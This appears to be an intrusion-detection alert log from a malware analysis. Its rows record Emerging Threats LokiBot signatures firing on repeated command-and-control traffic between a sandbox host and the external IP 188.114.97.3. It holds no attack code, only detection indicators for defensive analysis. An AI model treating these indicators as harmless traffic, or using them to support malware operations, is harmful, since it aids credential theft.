2024-09-25T10:20:10.343573+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.162336+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:11.972432+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:12.784342+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:13.600309+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:14.393221+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.204070+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:16.046849+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:16.874999+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:17.701124+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:18.577128+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:19.388646+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:20.429528+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.233233+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:22.045367+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:22.876653+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:23.686182+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:24.545070+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:25.516198+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:26.367186+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.187595+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:28.005117+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.823348+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:29.793057+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:30.724248+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:31.529840+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:32.349270+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.159073+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:34.004751+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.831696+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:35.676731+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:36.488105+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:37.347438+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.170705+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.983344+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:39.812510+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:40.679656+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:41.532089+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:42.407099+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.201046+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:44.020697+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.843940+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:45.767835+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:46.581998+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:47.383984+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:48.345316+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:49.177011+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.264754+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:51.117098+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.965926+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:52.847890+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:53.648400+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:54.469239+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.277763+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:56.095548+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.943672+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:57.765117+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:58.604735+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.652378+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:01.509563+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:02.530015+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:03.370905+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:04.493818+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.272946+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:06.101214+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.901425+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:07.859251+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:09.943417+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:10.818081+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:11.674440+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:12.571148+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49842	188.114.97.3	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:02.551070+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49842	TCP
2024-09-25T10:19:10.817841+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49701	TCP
2024-09-25T10:19:11.670551+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49702	TCP
2024-09-25T10:19:12.537084+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49703	TCP
2024-09-25T10:19:13.460991+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49704	TCP
2024-09-25T10:19:14.459844+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49705	TCP
2024-09-25T10:19:15.404341+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49706	TCP
2024-09-25T10:19:16.225141+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49707	TCP
2024-09-25T10:19:17.026938+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49708	TCP
2024-09-25T10:19:18.146905+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49709	TCP
2024-09-25T10:19:18.992492+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49710	TCP
2024-09-25T10:19:19.799882+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49711	TCP
2024-09-25T10:19:20.903837+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49712	TCP
2024-09-25T10:19:21.694245+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49713	TCP
2024-09-25T10:19:22.570360+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49714	TCP
2024-09-25T10:19:23.523583+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49715	TCP
2024-09-25T10:19:24.370931+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49718	TCP
2024-09-25T10:19:25.291419+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49720	TCP
2024-09-25T10:19:27.096966+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49723	TCP
2024-09-25T10:19:28.050244+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49724	TCP
2024-09-25T10:19:28.886614+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49725	TCP
2024-09-25T10:19:29.685693+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49726	TCP
2024-09-25T10:19:30.588201+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49727	TCP
2024-09-25T10:19:31.401029+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49728	TCP
2024-09-25T10:19:32.832107+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49729	TCP
2024-09-25T10:19:33.633464+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49730	TCP
2024-09-25T10:19:34.472797+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49731	TCP
2024-09-25T10:19:35.322924+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49732	TCP
2024-09-25T10:19:36.371522+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49733	TCP
2024-09-25T10:19:37.195299+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49734	TCP
2024-09-25T10:19:38.145206+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49735	TCP
2024-09-25T10:19:39.906710+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49736	TCP
2024-09-25T10:19:40.757426+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49737	TCP
2024-09-25T10:19:41.586005+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49738	TCP
2024-09-25T10:19:42.418949+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49739	TCP
2024-09-25T10:19:43.246416+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49740	TCP
2024-09-25T10:19:44.032597+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49741	TCP
2024-09-25T10:19:44.857234+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49742	TCP
2024-09-25T10:19:45.671293+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49743	TCP
2024-09-25T10:19:46.551465+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49744	TCP
2024-09-25T10:19:47.447756+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49745	TCP
2024-09-25T10:19:48.282001+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49746	TCP
2024-09-25T10:19:49.081572+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49747	TCP
2024-09-25T10:19:49.890230+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49748	TCP
2024-09-25T10:19:50.713445+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49749	TCP
2024-09-25T10:19:51.512658+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49750	TCP
2024-09-25T10:19:52.356086+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49751	TCP
2024-09-25T10:19:53.360531+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49752	TCP
2024-09-25T10:19:54.191774+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49753	TCP
2024-09-25T10:19:55.331030+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49754	TCP
2024-09-25T10:19:56.131913+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49755	TCP
2024-09-25T10:19:57.014226+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49756	TCP
2024-09-25T10:19:58.854920+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49757	TCP
2024-09-25T10:19:59.736725+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49758	TCP
2024-09-25T10:20:00.565087+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49759	TCP
2024-09-25T10:20:01.366740+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49760	TCP
2024-09-25T10:20:02.233938+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49761	TCP
2024-09-25T10:20:03.093667+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49763	TCP
2024-09-25T10:20:03.909832+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49764	TCP
2024-09-25T10:20:04.887903+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49765	TCP
2024-09-25T10:20:05.714461+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49766	TCP
2024-09-25T10:20:06.571760+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49767	TCP
2024-09-25T10:20:07.434671+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49768	TCP
2024-09-25T10:20:09.283551+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49769	TCP
2024-09-25T10:20:10.196689+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49770	TCP
2024-09-25T10:20:11.013287+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49771	TCP
2024-09-25T10:20:11.817332+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49772	TCP
2024-09-25T10:20:12.635415+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49773	TCP
2024-09-25T10:20:13.440852+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49774	TCP
2024-09-25T10:20:14.241223+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49775	TCP
2024-09-25T10:20:15.056810+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49776	TCP
2024-09-25T10:20:15.902727+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49777	TCP
2024-09-25T10:20:16.729213+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49778	TCP
2024-09-25T10:20:17.555476+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49779	TCP
2024-09-25T10:20:18.436115+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49780	TCP
2024-09-25T10:20:19.242304+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49781	TCP
2024-09-25T10:20:20.049175+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49782	TCP
2024-09-25T10:20:21.089402+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49783	TCP
2024-09-25T10:20:21.901715+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49784	TCP
2024-09-25T10:20:22.722686+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49785	TCP
2024-09-25T10:20:23.542018+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49786	TCP
2024-09-25T10:20:24.402809+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49787	TCP
2024-09-25T10:20:25.371419+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49788	TCP
2024-09-25T10:20:26.208265+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49789	TCP
2024-09-25T10:20:27.030372+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49790	TCP
2024-09-25T10:20:27.842255+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49791	TCP
2024-09-25T10:20:28.655543+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49792	TCP
2024-09-25T10:20:29.647628+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49793	TCP
2024-09-25T10:20:30.576547+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49794	TCP
2024-09-25T10:20:31.382078+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49795	TCP
2024-09-25T10:20:32.195932+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49796	TCP
2024-09-25T10:20:33.006817+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49797	TCP
2024-09-25T10:20:33.848087+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49798	TCP
2024-09-25T10:20:34.683975+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49799	TCP
2024-09-25T10:20:35.514687+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49800	TCP
2024-09-25T10:20:36.338191+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49801	TCP
2024-09-25T10:20:37.196799+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49802	TCP
2024-09-25T10:20:38.018123+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49803	TCP
2024-09-25T10:20:38.835742+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49804	TCP
2024-09-25T10:20:39.661421+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49805	TCP
2024-09-25T10:20:40.528482+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49806	TCP
2024-09-25T10:20:41.378361+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49807	TCP
2024-09-25T10:20:42.253717+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49808	TCP
2024-09-25T10:20:43.050099+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49809	TCP
2024-09-25T10:20:43.859419+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49810	TCP
2024-09-25T10:20:44.689401+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49811	TCP
2024-09-25T10:20:45.510355+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49812	TCP
2024-09-25T10:20:46.432138+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49813	TCP
2024-09-25T10:20:47.227872+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49814	TCP
2024-09-25T10:20:48.054731+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49815	TCP
2024-09-25T10:20:49.025566+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49816	TCP
2024-09-25T10:20:50.108060+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49817	TCP
2024-09-25T10:20:50.954575+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49818	TCP
2024-09-25T10:20:51.813535+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49819	TCP
2024-09-25T10:20:52.625510+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49820	TCP
2024-09-25T10:20:53.484717+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49821	TCP
2024-09-25T10:20:54.318662+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49822	TCP
2024-09-25T10:20:55.126025+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49823	TCP
2024-09-25T10:20:55.943963+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49824	TCP
2024-09-25T10:20:56.785409+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49825	TCP
2024-09-25T10:20:57.621047+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49826	TCP
2024-09-25T10:20:58.439188+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49827	TCP
2024-09-25T10:20:59.265646+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49828	TCP
2024-09-25T10:21:00.492931+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49829	TCP
2024-09-25T10:21:01.357871+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49830	TCP
2024-09-25T10:21:02.145946+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49831	TCP
2024-09-25T10:21:03.204695+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49832	TCP
2024-09-25T10:21:04.019903+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49833	TCP
2024-09-25T10:21:05.136585+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49834	TCP
2024-09-25T10:21:05.954767+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49835	TCP
2024-09-25T10:21:06.752043+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49836	TCP
2024-09-25T10:21:07.597503+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49837	TCP
2024-09-25T10:21:08.550360+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49838	TCP
2024-09-25T10:21:10.675340+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49839	TCP
2024-09-25T10:21:11.517815+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49840	TCP
2024-09-25T10:21:12.361141+0200	2025483	1	A Network Trojan was detected	188.114.97.3	80	192.168.2.7	49841	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:10.811770+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:11.665714+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:12.531180+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:13.453182+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:14.450457+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:15.399528+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:16.220301+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:17.022071+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:18.146657+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.987415+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:19.794940+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:20.899036+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:21.689404+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:22.552651+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:23.518806+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:24.365883+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:25.286543+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:27.092250+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:28.045248+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.881607+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:29.680830+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:30.583036+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:31.369595+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:32.827325+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:33.628049+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:34.467992+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:35.318075+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:36.366610+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:37.190467+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49734	188.114.97.3	80	TCP
